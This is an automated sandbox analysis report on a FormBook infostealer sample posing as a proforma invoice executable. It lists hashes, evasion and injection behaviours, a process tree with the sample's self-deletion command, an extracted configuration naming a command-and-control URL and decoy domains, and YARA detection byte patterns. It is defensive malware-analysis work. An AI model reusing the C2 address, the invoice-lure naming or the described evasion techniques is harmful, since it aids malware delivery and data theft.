Play interactive tour

Edit tour

Analysis Report Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Overview

General Information

Sample Name:	Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Analysis ID:	432567
MD5:	b148ae414eb8a1b34a15cdb32c21f9ee
SHA1:	25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256:	193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)

Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

raserver.exe (PID: 5888 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)

cmd.exe (PID: 6764 cmdline: /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Virustotal: Detection: 29%			Perma Link
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
